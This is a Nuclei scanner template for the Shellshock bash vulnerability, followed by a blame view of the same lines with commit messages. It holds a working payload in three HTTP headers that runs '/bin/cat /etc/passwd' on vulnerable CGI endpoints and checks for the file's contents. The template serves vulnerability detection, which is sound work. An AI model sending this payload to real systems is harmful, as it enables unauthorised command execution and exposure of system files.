nuclei-templates/cves/2014/CVE-2014-6271.yaml

id: CVE-2014-6271

info:
  name: Shellshock
  author: pentest_swissky
  severity: high
  description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
  reference:
    - http://www.kb.cert.org/vuls/id/252743
    - http://www.us-cert.gov/ncas/alerts/TA14-268A
  tags: cve,cve2014,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/cgi-bin/status"
      - "{{BaseURL}}/cgi-bin/stats"
      - "{{BaseURL}}/cgi-bin/test"
      - "{{BaseURL}}/cgi-bin/status/status.cgi"
      - "{{BaseURL}}/test.cgi"
      - "{{BaseURL}}/debug.cgi"
      - "{{BaseURL}}/cgi-bin/test-cgi"
    headers:
      Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
      Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
      Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
CVE-2014-6271 Shellshock 2020-10-01 18:03:35 +00:00			`id: CVE-2014-6271`

			`info:`
			`name: Shellshock`
			`author: pentest_swissky`
			`severity: high`
			`description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Description and references 2021-04-22 09:02:19 +00:00			`- http://www.kb.cert.org/vuls/id/252743`
			`- http://www.us-cert.gov/ncas/alerts/TA14-268A`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2014,rce`
CVE-2014-6271 Shellshock 2020-10-01 18:03:35 +00:00
			`requests:`
			`- method: GET`
			`path:`
Preparing for request clustering 2021-01-13 07:31:46 +00:00			`- "{{BaseURL}}"`
CVE-2014-6271 Shellshock 2020-10-01 18:03:35 +00:00			`- "{{BaseURL}}/cgi-bin/status"`
			`- "{{BaseURL}}/cgi-bin/stats"`
			`- "{{BaseURL}}/cgi-bin/test"`
			`- "{{BaseURL}}/cgi-bin/status/status.cgi"`
			`- "{{BaseURL}}/test.cgi"`
			`- "{{BaseURL}}/debug.cgi"`
Update CVE-2014-6271.yaml 2021-07-23 03:10:33 +00:00			`- "{{BaseURL}}/cgi-bin/test-cgi"`
CVE-2014-6271 Shellshock 2020-10-01 18:03:35 +00:00			`headers:`
Update CVE-2014-6271.yaml 2020-10-01 18:45:00 +00:00			`Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "`
			`Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "`
			`Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "`
CVE-2014-6271 Shellshock 2020-10-01 18:03:35 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
Fixing the YAMLint error for CVE-2014-6271 2020-10-01 18:28:37 +00:00			`part: body`